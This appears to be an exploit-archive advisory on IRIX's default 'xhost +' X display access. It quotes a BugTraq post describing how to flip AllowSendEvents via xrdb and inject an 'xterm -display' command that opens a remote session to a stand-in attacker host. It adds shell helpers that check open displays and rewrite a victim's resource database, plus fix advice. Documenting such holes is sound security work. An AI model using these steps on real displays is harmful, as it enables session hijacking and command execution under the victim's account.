IRIX stupid xhost + default
Description: | For X sessions, IRIX (I think up to 6.3) by default gives global access to the display (i.e. xhost +). Duh. Of course this fits in very well with their default non-passworded guest account and their security-filled default crontab (see those other exploit entries for more information). |
Author: | Well known, but Matt Harrigan <matth@CONNECTNET.COM> posted interesting comments on exploiting the hole in reply to someone who mentioned the problem. |
Compromise: | Take over an X session |
Vulnerable Systems: | IRIX, up to 6.3 I believe, using the default IRIX X access permissions. |
Date: | 19 May 1997 |
Date: Mon, 19 May 1997 10:19:07 -0700
From: Matt Harrigan <matth@CONNECTNET.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Reminder for irix ppl/xevents
> The following has been used, abused, and exploited like mad, however a
> little reminder may not hurt. In the default setup for irix boxes, xhost
> is set to global access whenever someone logs in on console (or invokes
> xdm). There may be some good reason for this default behavior, however
> it's often a nuisance in situations where one is around a lot of immature
> ppl just waiting to xdisplay '/usr/bin/X11/endsession -f' to your console.
On a far more unhappy note, ending your session is probably the nicest
thing they could do. If someone has access to your X display, they
also have control of the resource database for your session, which
contains all of the attributes assigned to that session. One of these
attributes (AllowSendEvents), controls the receiving of events from
a process foreign to the current event in question. i.e., when a window
is created, it reads information from RESOURCE_MANAGER and
SCREEN_RESOURCES via xrdb, which contains these attributes (like
AllowSendEvents). Unfortunately, when someone has r/w access to your
display, they have r/w access to the database, and therefore, all
of your attributes. All one needs to do at this point is
manually utilize xrdb to retrieve a copy of the database, modify
AllowSendEvents: true, reupload the database, and wait for
a user to launch another xterm (so the new attributes can take
effect). It is then trivial to write an xevent interjection tool,
to send "xterm -display IAMAMEANMANONAMEANHOST:0.0" to the window
based on window id, which can also be easily retrieved from the server.
Obviously, the command will be executed as whatever user the session
belongs to, and I'm sure quite a few of us log onto the console as root.
Matt Harrigan
CIO, Microcosm Computer Resources
matth@mcr.com
415-333-1062
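The post above describes two things a practitioner would want to script: a check for whether a display is wide open (the "xhost +" default), and the xrdb round trip that flips the xterm allowSendEvents resource so that a remote XSendEvent is honoured. The shell helpers below are an added example, not code from the original page or from Matt Harrigan; the `xhost` output wording ("access control disabled, clients can connect from any host") is the X11R6/X.Org format and is assumed to match what IRIX prints, the resource name `XTerm*allowSendEvents` is the one xterm documents, and the hostname `victim` in the commented usage lines is made up. The sample xrdb dumps are constructed here for the check, not captured from a real machine.

```sh
#!/bin/sh
# Added example around the IRIX "xhost +" default discussed on this page.
#
#  xhost_is_open        - given the text printed by `xhost`, returns 0 when the
#                         server has access control disabled (any host may connect).
#  enable_send_events   - reads an `xrdb -query` dump on stdin and writes it back
#                         with XTerm*allowSendEvents forced to true (replacing an
#                         existing line or appending one), ready for `xrdb -load`.
#  send_events_enabled  - returns 0 when a dump on stdin already has the resource
#                         set to true.
#
# Assumptions: xhost output format as in X11R6/X.Org; resource name as documented
# by xterm. Host "victim" in the comments below is a placeholder.

xhost_is_open() {
    # Pass the whole `xhost` output as one argument, e.g.
    #   xhost_is_open "$(xhost -display victim:0)"
    printf '%s\n' "$1" | grep -qi 'access control disabled'
}

enable_send_events() {
    # Match any widget prefix (XTerm*, xterm*, *) and either class or instance
    # spelling; keep every other resource untouched. POSIX awk only.
    awk '
        /^[^:]*[aA]llowSendEvents[ \t]*:/ {
            print "XTerm*allowSendEvents:\ttrue"; seen = 1; next
        }
        { print }
        END { if (!seen) print "XTerm*allowSendEvents:\ttrue" }
    '
}

send_events_enabled() {
    grep -qi 'allowSendEvents:[[:space:]]*true'
}

# Live usage (not executed here):
#
# Check a display from anywhere it is reachable:
#   xhost_is_open "$(xhost -display victim:0)" && echo "victim:0 accepts any host"
#
# The resource edit the post describes; takes effect in the next xterm started
# in that session, after which XSendEvent key events are no longer discarded:
#   xrdb -display victim:0 -query | enable_send_events | xrdb -display victim:0 -load
#
# Closing the hole on your own console for this session:
#   xhost -
```

The right fix is not `xhost` with a host list at all but cookie-based access control (xauth with MIT-MAGIC-COOKIE-1), which xdm can generate per session; `xhost -` only restores host-based control until the next login runs the session script again, so the `xhost +` in the xdm session startup has to go as well.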
This page is part of Fyodor's exploit world.